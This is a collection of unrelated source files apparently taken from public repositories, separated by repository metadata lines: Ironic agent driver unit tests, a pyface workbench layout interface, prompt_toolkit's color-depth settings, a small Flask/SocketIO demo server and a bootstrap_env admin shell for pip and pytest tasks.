get_power_state_mock,
node_power_action_mock,
uuid_mock, boot_mode_mock):
check_deploy_mock.return_value = None
uuid_mock.return_value = 'root_uuid'
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
boot_mode_mock.return_value = 'bios'
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = False
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
prepare_mock.assert_called_once_with(task.driver.boot, task)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
driver_int_info = task.node.driver_internal_info
self.assertEqual(driver_int_info.get('root_uuid_or_disk_id'),
'root_uuid')
uuid_mock.assert_called_once_with(self.passthru, task, 'root_uuid')
boot_mode_mock.assert_called_once_with(task.node)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_boot_none(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
self.assertFalse(prepare_mock.called)
power_off_mock.assert_called_once_with(task.node)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
driver_int_info = task.node.driver_internal_info
self.assertIsNone(driver_int_info.get('root_uuid_or_disk_id'))
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
self.assertFalse(uuid_mock.called)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_boot_error(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = "Error"
uuid_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
self.assertFalse(prepare_mock.called)
self.assertFalse(power_off_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
self.assertEqual(states.DEPLOYFAIL, task.node.provision_state)
self.assertEqual(states.ACTIVE, task.node.target_provision_state)
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'configure_local_boot', autospec=True)
@mock.patch.object(deploy_utils, 'try_set_boot_device', autospec=True)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_localboot(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock,
bootdev_mock,
configure_mock):
check_deploy_mock.return_value = None
uuid_mock.side_effect = ['root_uuid', 'efi_uuid']
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = False
boot_option = {'capabilities': '{"boot_option": "local"}'}
task.node.instance_info = boot_option
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
self.assertFalse(bootdev_mock.called)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = []
self.assertFalse(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_is_done(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'SUCCESS'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_did_start(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_multiple_commands(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'cache_image',
'command_status': 'SUCCESS'},
{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_other_commands(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'cache_image',
'command_status': 'SUCCESS'}]
self.assertFalse(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'SUCCESS'}]
self.assertTrue(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_empty_response(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = []
self.assertFalse(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_race(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'some_other_command',
'command_status': 'SUCCESS'}]
self.assertFalse(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_still_running(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertFalse(self.passthru.deploy_is_done(task))
class AgentRAIDTestCase(db_base.DbTestCase):
def setUp(self):
super(AgentRAIDTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_agent")
self.passthru = agent.AgentVendorInterface()
self.target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 0, 'is_root_volume': True},
{'size_gb': 200, 'raid_level': 5}
]}
self.clean_step = {'step': 'create_configuration',
'interface': 'raid'}
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
'target_raid_config': self.target_raid_config,
'clean_step': self.clean_step,
}
self.node = object_utils.create_test_node(self.context, **n)
@mock.patch.object(deploy_utils, 'agent_get_clean_steps', autospec=True)
def test_get_clean_steps(self, get_steps_mock):
get_steps_mock.return_value = [
{'step': 'create_configuration', 'interface': 'raid',
'priority': 1},
{'step': 'delete_configuration', 'interface': 'raid',
'priority': 2}]
with task_manager.acquire(self.context, self.node.uuid) as task:
ret = task.driver.raid.get_clean_steps(task)
self.assertEqual(0, ret[0]['priority'])
self.assertEqual(0, ret[1]['priority'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(task)
self.assertEqual(states.CLEANWAIT, return_value)
self.assertEqual(
self.target_raid_config,
task.node.driver_internal_info['target_raid_config'])
execute_mock.assert_called_once_with(task, self.clean_step)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_skip_root(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(
task, create_root_volume=False)
self.assertEqual(states.CLEANWAIT, return_value)
execute_mock.assert_called_once_with(task, self.clean_step)
exp_target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 5}
]}
self.assertEqual(
exp_target_raid_config,
task.node.driver_internal_info['target_raid_config'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_skip_nonroot(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(
task, create_nonroot_volumes=False)
self.assertEqual(states.CLEANWAIT, return_value)
execute_mock.assert_called_once_with(task, self.clean_step)
exp_target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 0, 'is_root_volume': True},
]}
self.assertEqual(
exp_target_raid_config,
task.node.driver_internal_info['target_raid_config'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_no_target_raid_config_after_skipping(
self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(
exception.MissingParameterValue,
task.driver.raid.create_configuration,
task, create_root_volume=False,
create_nonroot_volumes=False)
self.assertFalse(execute_mock.called)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_empty_target_raid_config(
self, execute_mock):
execute_mock.return_value = states.CLEANING
self.node.target_raid_config = {}
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.raid.create_configuration,
task)
self.assertFalse(execute_mock.called)
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final(
self, update_raid_info_mock):
command = {'command_result': {'clean_result': 'foo'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
raid_mgmt = agent.AgentRAID
raid_mgmt._create_configuration_final(task, command)
update_raid_info_mock.assert_called_once_with(task.node, 'foo')
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final_registered(
self, update_raid_info_mock):
self.node.clean_step = {'interface': 'raid',
'step': 'create_configuration'}
command = {'command_result': {'clean_result': 'foo'}}
create_hook = agent_base_vendor._get_post_clean_step_hook(self.node)
with task_manager.acquire(self.context, self.node.uuid) as task:
create_hook(task, command)
update_raid_info_mock.assert_called_once_with(task.node, 'foo')
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final_bad_command_result(
self, update_raid_info_mock):
command = {}
with task_manager.acquire(self.context, self.node.uuid) as task:
raid_mgmt = agent.AgentRAID
self.assertRaises(exception.IronicException,
raid_mgmt._create_configuration_final,
task, command)
self.assertFalse(update_raid_info_mock.called)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_delete_configuration(self, execute_mock):
execute_mock.return_value = states.CLEANING
with task_manager.acquire(self.context, self.node.uuid) as task:
return_value = task.driver.raid.delete_configuration(task)
execute_mock.assert_called_once_with(task, self.clean_step)
self.assertEqual(states.CLEANING, return_value)
def test__delete_configuration_final(self):
command = {'command_result': {'clean_result': 'foo'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.raid_config = {'foo': 'bar'}
raid_mgmt = agent.AgentRAID
raid_mgmt._delete_configuration_final(task, command)
self.node.refresh()
self.assertEqual({}, self.node.raid_config)
def test__delete_configuration_final_registered(
self):
self.node.clean_step = {'interface': 'raid',
'step': 'delete_configuration'}
self.node.raid_config = {'foo': 'bar'}
command = {'command_result': {'clean_result': 'foo'}}
delete_hook = agent_base_vendor._get_post_clean_step_hook(self.node)
with task_manager.acquire(self.context, self.node.uuid) as task:
delete_hook(task, command)
self.node.refresh()
self.assertEqual({}, self.node.raid_config)
| apache-2.0 | 5,521,264,999,136,211,000 | 47.468828 | 79 | 0.590176 | false |
geggo/pyface | pyface/workbench/i_workbench_window_layout.py | 3 | 10821 | #------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" The workbench window layout interface. """
# Enthought library imports.
from traits.api import Event, HasTraits, Instance, Interface, Str
from traits.api import provides
# Local imports.
from .i_editor import IEditor
from .i_view import IView
class IWorkbenchWindowLayout(Interface):
""" The workbench window layout interface.
Window layouts are responsible for creating and managing the internal
structure of a workbench window (it knows how to add and remove views and
editors etc).
"""
# The Id of the editor area.
# FIXME v3: This is toolkit specific.
editor_area_id = Str
# The workbench window that this is the layout for.
window = Instance('pyface.workbench.api.WorkbenchWindow')
#### Events ####
# Fired when an editor is about to be opened (or restored).
editor_opening = Event(IEditor)
# Fired when an editor has been opened (or restored).
editor_opened = Event(IEditor)
# Fired when an editor is about to be closed.
editor_closing = Event(IEditor)
# Fired when an editor has been closed.
editor_closed = Event(IEditor)
# Fired when a view is about to be opened (or restored).
view_opening = Event(IView)
# Fired when a view has been opened (or restored).
view_opened = Event(IView)
# Fired when a view is about to be closed (*not* hidden!).
view_closing = Event(IView)
# Fired when a view has been closed (*not* hidden!).
view_closed = Event(IView)
# FIXME v3: The "just for convenience" returns are a really bad idea.
#
# Why? They allow the call to be used on the LHS of an expression...
# Because they have nothing to do with what the call is supposed to be
# doing, they are unlikely to be used (because they are so unexpected and
# inconsistently implemented), and only serve to replace two shorter lines
# of code with one long one, arguably making code more difficult to read.
def activate_editor(self, editor):
""" Activate an editor.
Returns the editor (just for convenience).
"""
def activate_view(self, view):
""" Activate a view.
Returns the view (just for convenience).
"""
def add_editor(self, editor, title):
""" Add an editor.
Returns the editor (just for convenience).
"""
def add_view(self, view, position=None, relative_to=None, size=(-1, -1)):
""" Add a view.
Returns the view (just for convenience).
"""
def close_editor(self, editor):
""" Close an editor.
Returns the editor (just for convenience).
"""
def close_view(self, view):
""" Close a view.
FIXME v3: Currently views are never 'closed' in the same sense as an
editor is closed. When we close an editor, we destroy its control.
When we close a view, we merely hide its control. I'm not sure if this
is a good idea or not. It came about after discussion with Dave P. and
he mentioned that some views might find it hard to persist enough state
that they can be re-created exactly as they were when they are shown
again.
Returns the view (just for convenience).
"""
def close(self):
""" Close the entire window layout.
FIXME v3: Should this be called 'destroy'?
"""
def create_initial_layout(self, parent):
""" Create the initial window layout.
Returns the layout.
"""
def contains_view(self, view):
""" Return True if the view exists in the window layout.
Note that this returns True even if the view is hidden.
"""
def hide_editor_area(self):
""" Hide the editor area.
"""
def hide_view(self, view):
""" Hide a view.
Returns the view (just for convenience).
"""
def refresh(self):
""" Refresh the window layout to reflect any changes.
"""
def reset_editors(self):
""" Activate the first editor in every group.
"""
def reset_views(self):
""" Activate the first view in every region.
"""
def show_editor_area(self):
""" Show the editor area.
"""
def show_view(self, view):
""" Show a view.
"""
#### Methods for saving and restoring the layout ##########################
def get_view_memento(self):
""" Returns the state of the views.
"""
def set_view_memento(self, memento):
""" Restores the state of the views.
"""
def get_editor_memento(self):
""" Returns the state of the editors.
"""
def set_editor_memento(self, memento):
""" Restores the state of the editors.
"""
def get_toolkit_memento(self):
""" Return any toolkit-specific data that should be part of the memento.
"""
def set_toolkit_memento(self, memento):
""" Restores any toolkit-specific data.
"""
@provides(IWorkbenchWindowLayout)
class MWorkbenchWindowLayout(HasTraits):
""" Mixin containing common code for toolkit-specific implementations. """
#### 'IWorkbenchWindowLayout' interface ###################################
# The Id of the editor area.
# FIXME v3: This is toolkit specific.
editor_area_id = Str
# The workbench window that this is the layout for.
window = Instance('pyface.workbench.api.WorkbenchWindow')
#### Events ####
# Fired when an editor is about to be opened (or restored).
editor_opening = Event(IEditor)
# Fired when an editor has been opened (or restored).
editor_opened = Event(IEditor)
# Fired when an editor is about to be closed.
editor_closing = Event(IEditor)
# Fired when an editor has been closed.
editor_closed = Event(IEditor)
# Fired when a view is about to be opened (or restored).
view_opening = Event(IView)
# Fired when a view has been opened (or restored).
view_opened = Event(IView)
# Fired when a view is about to be closed (*not* hidden!).
view_closing = Event(IView)
# Fired when a view has been closed (*not* hidden!).
view_closed = Event(IView)
###########################################################################
# 'IWorkbenchWindowLayout' interface.
###########################################################################
def activate_editor(self, editor):
""" Activate an editor. """
raise NotImplementedError
def activate_view(self, view):
""" Activate a view. """
raise NotImplementedError
def add_editor(self, editor, title):
""" Add an editor. """
raise NotImplementedError
def add_view(self, view, position=None, relative_to=None, size=(-1, -1)):
""" Add a view. """
raise NotImplementedError
def close_editor(self, editor):
""" Close an editor. """
raise NotImplementedError
def close_view(self, view):
""" Close a view. """
raise NotImplementedError
def close(self):
""" Close the entire window layout. """
raise NotImplementedError
def create_initial_layout(self, parent):
""" Create the initial window layout. """
raise NotImplementedError
def contains_view(self, view):
""" Return True if the view exists in the window layout. """
raise NotImplementedError
def hide_editor_area(self):
""" Hide the editor area. """
raise NotImplementedError
def hide_view(self, view):
""" Hide a view. """
raise NotImplementedError
def refresh(self):
""" Refresh the window layout to reflect any changes. """
raise NotImplementedError
def reset_editors(self):
""" Activate the first editor in every group. """
raise NotImplementedError
def reset_views(self):
""" Activate the first view in every region. """
raise NotImplementedError
def show_editor_area(self):
""" Show the editor area. """
raise NotImplementedError
def show_view(self, view):
""" Show a view. """
raise NotImplementedError
#### Methods for saving and restoring the layout ##########################
def get_view_memento(self):
""" Returns the state of the views. """
raise NotImplementedError
def set_view_memento(self, memento):
""" Restores the state of the views. """
raise NotImplementedError
def get_editor_memento(self):
""" Returns the state of the editors. """
raise NotImplementedError
def set_editor_memento(self, memento):
""" Restores the state of the editors. """
raise NotImplementedError
def get_toolkit_memento(self):
""" Return any toolkit-specific data that should be part of the memento.
"""
return None
def set_toolkit_memento(self, memento):
""" Restores any toolkit-specific data.
"""
return
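    # Editorial illustration (not part of pyface): a workbench window would
    # typically use the memento methods above as a matched pair. A
    # hypothetical save/restore cycle looks like:
    #
    #     state = (layout.get_view_memento(), layout.get_editor_memento())
    #     ... later, on the next start-up ...
    #     layout.set_view_memento(state[0])
    #     layout.set_editor_memento(state[1])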
###########################################################################
# Protected 'MWorkbenchWindowLayout' interface.
###########################################################################
def _get_editor_references(self):
""" Returns a reference to every editor. """
editor_manager = self.window.editor_manager
editor_references = {}
for editor in self.window.editors:
# Create the editor reference.
#
# If the editor manager returns 'None' instead of a resource
# reference then this editor will not appear the next time the
# workbench starts up. This is useful for things like text files
# that have an editor but have NEVER been saved.
editor_reference = editor_manager.get_editor_memento(editor)
if editor_reference is not None:
editor_references[editor.id] = editor_reference
return editor_references
#### EOF ######################################################################
| bsd-3-clause | -4,267,509,263,042,674,000 | 26.675192 | 80 | 0.590796 | false |
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/output/color_depth.py | 1 | 1497 | from __future__ import unicode_literals
from prompt_toolkit.utils import is_windows
import os
__all__ = [
'ColorDepth',
]
class ColorDepth(object):
"""
Possible color depth values for the output.
"""
#: One color only.
DEPTH_1_BIT = 'DEPTH_1_BIT'
#: ANSI Colors.
DEPTH_4_BIT = 'DEPTH_4_BIT'
#: The default.
DEPTH_8_BIT = 'DEPTH_8_BIT'
#: 24 bit True color.
DEPTH_24_BIT = 'DEPTH_24_BIT'
# Aliases.
MONOCHROME = DEPTH_1_BIT
ANSI_COLORS_ONLY = DEPTH_4_BIT
DEFAULT = DEPTH_8_BIT
TRUE_COLOR = DEPTH_24_BIT
_ALL = [DEPTH_1_BIT, DEPTH_4_BIT, DEPTH_8_BIT, DEPTH_24_BIT]
@classmethod
def default(cls, term=''):
"""
If the user doesn't specify a color depth, use this as a default.
"""
if term in ('linux', 'eterm-color'):
return cls.DEPTH_4_BIT
# For now, always use 4 bit color on Windows 10 by default, even when
# vt100 escape sequences with ENABLE_VIRTUAL_TERMINAL_PROCESSING are
# supported. We don't have a reliable way yet to know whether our
# console supports true color or only 4-bit.
if is_windows() and 'PROMPT_TOOLKIT_COLOR_DEPTH' not in os.environ:
return cls.DEPTH_4_BIT
# Check the `PROMPT_TOOLKIT_COLOR_DEPTH` environment variable.
if os.environ.get('PROMPT_TOOLKIT_COLOR_DEPTH') in cls._ALL:
return os.environ['PROMPT_TOOLKIT_COLOR_DEPTH']
return cls.DEPTH_8_BIT
| mit | 2,101,513,724,883,425,300 | 27.245283 | 77 | 0.616566 | false |
WorldViews/Spirals | dummyServer.py | 1 | 2519 |
import json, time
import flask
from flask import Flask, render_template, send_file, \
jsonify, send_from_directory, request
from flask_socketio import SocketIO, emit
rdb = None
try:
import rethinkdb as rdb
#rdb.connect('localhost', 28015).repl()
conn = rdb.connect(db='test')
except:
print "*** Running without DB ***"
rdb = None
app = Flask(__name__, static_url_path='')
app.debug = True
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
@app.route('/')
def index():
return send_file('index.html')
@app.route('/regp/', methods=['POST','GET'])
def reg():
print "reg path:", request.path
print "reg args", request.args
t = time.time()
name = request.args.get('name')
tagStr = request.args.get('tagStr')
clientType = request.args.get('clientType')
lon = float(request.args.get('longitude'))
lat = float(request.args.get('latitude'))
room = request.args.get('room')
numUsers = int(request.args.get('numUsers'))
obj = {'t': t, 'name': name, 'tagStr': tagStr,
'lon': lon, 'lat': lat, 'room': room,
'numUsers': numUsers, 'clientType': clientType}
print obj
return "ok"
@app.route('/Viewer/<path:path>')
def send(path):
print "send_page", path
return send_from_directory('Viewer', path)
@app.route('/Cesium/<path:path>')
def send_page(path):
print "send_page", path
return send_from_directory('Cesium', path)
@app.route('/db/<path:etype>')
def query(etype):
#print "query", etype
t = time.time()
if rdb == None:
return flask.jsonify({'error': 'No DB', 't': t, 'records': []})
recs = rdb.table(etype).run(conn)
items = [x for x in recs]
obj = {'type': etype,
't' : t,
'records': items}
return flask.jsonify(obj)
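# Illustrative client for the /db/<etype> endpoint above (editorial sketch,
# not part of the original server; assumes it runs on localhost:80 and that
# the 'requests' package is available):
#
#   import requests
#   notes = requests.get("http://localhost/db/notes").json()
#   print notes["t"], len(notes["records"])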
@socketio.on('my event')
def test_message(message):
emit('my response', {'data': 'got it!'})
@socketio.on('chat')
def handle_chat(msg):
print "handle_chat:", msg
emit('chat', msg, broadcast=True)
addMsg(msg, 'chat')
@socketio.on('notes')
def handle_notes(msg):
print "handle_notes:", msg
emit('notes', msg, broadcast=True)
addMsg(msg, 'notes')
@socketio.on('people')
def handle_people(msg):
#print "handle_people:", msg
emit('people', msg, broadcast=True)
def addMsg(msgStr, etype):
obj = json.loads(msgStr)
rdb.table(etype).insert(obj).run(conn)
if __name__ == '__main__':
#socketio.run(app, port=80)
socketio.run(app, host="0.0.0.0", port=80)
| mit | -4,448,048,485,143,224,300 | 25.239583 | 71 | 0.613339 | false |
jedie/bootstrap_env | bootstrap_env/admin_shell/normal_shell.py | 1 | 7715 |
"""
Admin Shell commands available in 'normal' install mode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IMPORTANT:
Every import from external packages must be made with LazyImportError!
Otherwise the bootstrap will fail, because no external package is
available in bootstrap process!
:created: 03.2018 by Jens Diemer, www.jensdiemer.de
:copyleft: 2018 by the bootstrap_env team, see AUTHORS for more details.
:license: GNU General Public License v3 or later (GPLv3+), see LICENSE for more details.
"""
import os
import sys
from pathlib import Path
# Bootstrap-Env
from bootstrap_env.boot_bootstrap_env import Cmd2, VerboseSubprocess, __version__, get_pip_file_name, in_virtualenv
from bootstrap_env.utils.import_utils import LazyImportError
from bootstrap_env.version import __version__ as bootstrap_env_version
# External libs:
try:
from cookiecutter.main import cookiecutter
except ImportError as err:
# Re-Raise ImportError on first usage
cookiecutter = LazyImportError(err)
class AdminShell(Cmd2):
"""
Normal user commands.
    Only these commands are available in 'normal' installation mode.
"""
version = __version__
def __init__(self, path_helper, *args, **kwargs):
self.path_helper = path_helper # bootstrap_env.admin_shell.path_helper.PathHelper instance
super().__init__(*args, **kwargs)
def get_pip3_path(self):
if not in_virtualenv():
self.stdout.write("\nERROR: Only allowed in activated virtualenv!\n\n")
return
if sys.platform == 'win32':
bin_dir_name="Scripts"
else:
bin_dir_name = "bin"
pip3_path = Path(sys.prefix, bin_dir_name, get_pip_file_name()) # e.g.: .../bin/pip3
if not pip3_path.is_file():
print("ERROR: pip not found here: '%s'" % pip3_path)
return
print("pip found here: '%s'" % pip3_path)
return pip3_path
def do_install_test_requirements(self, arg=None):
"""
Install packages to run tests
"""
pip3_path = self.get_pip3_path()
VerboseSubprocess(
str(pip3_path), "install", "-r", str(self.path_helper.test_req_path)
).verbose_call(check=True) # Exit on error
def do_pytest(self, arg=None):
"""
Run tests via pytest
"""
try:
import pytest
except ImportError as err:
print("ERROR: Can't import pytest: %s (pytest not installed, in normal installation!)" % err)
else:
root_path = str(self.path_helper.base)
print("chdir %r" % root_path)
os.chdir(root_path)
args = sys.argv[2:]
print("Call Pytest with args: %s" % repr(args))
exit_code = pytest.main(args=args)
sys.exit(exit_code)
def do_pip_freeze(self, arg=None):
"""
Just run 'pip freeze'
"""
return_code = VerboseSubprocess("pip3", "freeze").verbose_call(check=False)
def do_update_env(self, arg=None):
"""
Update all packages in virtualenv.
        (Call this command only in an activated virtualenv.)
"""
pip3_path = str(self.get_pip3_path())
# Upgrade pip first:
if sys.platform == 'win32':
# Note: On windows it will crash with a PermissionError: [WinError 32]
# because pip can't replace himself while running ;)
# Work-a-round is "python -m pip install --upgrade pip"
# see also: https://github.com/pypa/pip/issues/3804
return_code = VerboseSubprocess(
sys.executable or "python",
"-m", "pip", "install", "--upgrade", "pip",
).verbose_call(check=False)
else:
return_code = VerboseSubprocess(
pip3_path, "install", "--upgrade", "pip"
).verbose_call(check=False)
root_path = self.path_helper.base.parent
# Update the requirements files by...
if self.path_helper.normal_mode:
# ... update 'bootstrap_env' PyPi package
return_code = VerboseSubprocess(
pip3_path, "install", "--upgrade", self.path_helper.egg_name
).verbose_call(check=False)
else:
# ... git pull bootstrap_env sources
return_code = VerboseSubprocess(
"git", "pull", "origin",
cwd=str(root_path)
).verbose_call(check=False)
return_code = VerboseSubprocess(
pip3_path, "install", "--editable", ".",
cwd=str(root_path)
).verbose_call(check=False)
requirement_file_path = str(self.path_helper.req_filepath)
# Update with requirements files:
self.stdout.write("Use: '%s'\n" % requirement_file_path)
return_code = VerboseSubprocess(
pip3_path, "install",
"--exists-action", "b", # action when a path already exists: (b)ackup
"--upgrade",
"--requirement", requirement_file_path,
timeout=120 # extended timeout for slow Travis ;)
).verbose_call(check=False)
self.stdout.write("Please restart %s\n" % self.self_filename)
sys.exit(0)
def do_pip_sync(self, arg=None):
"""
run pip-sync (use with care)
pip-sync will install/upgrade/uninstall everything necessary to match the requirements.txt contents.
Be careful: pip-sync is meant to be used only with a requirements.txt generated by pip-compile!
"""
if self.path_helper.egg_name == "bootstrap_env":
print("ERROR: command not allowed for 'bootstrap_env' !\n")
print(
"bootstrap_env doesn't use pip-compile,"
" because Bootstrap-env should be used as a tool in other projects"
" and the projects himself should pin requirements ;) "
)
return
# Run pip-sync only in developer mode
return_code = VerboseSubprocess(
"pip-sync", str(self.path_helper.req_filepath),
cwd=str(self.path_helper.base.parent)
).verbose_call(check=False)
self.stdout.write("Please restart %s\n" % self.self_filename)
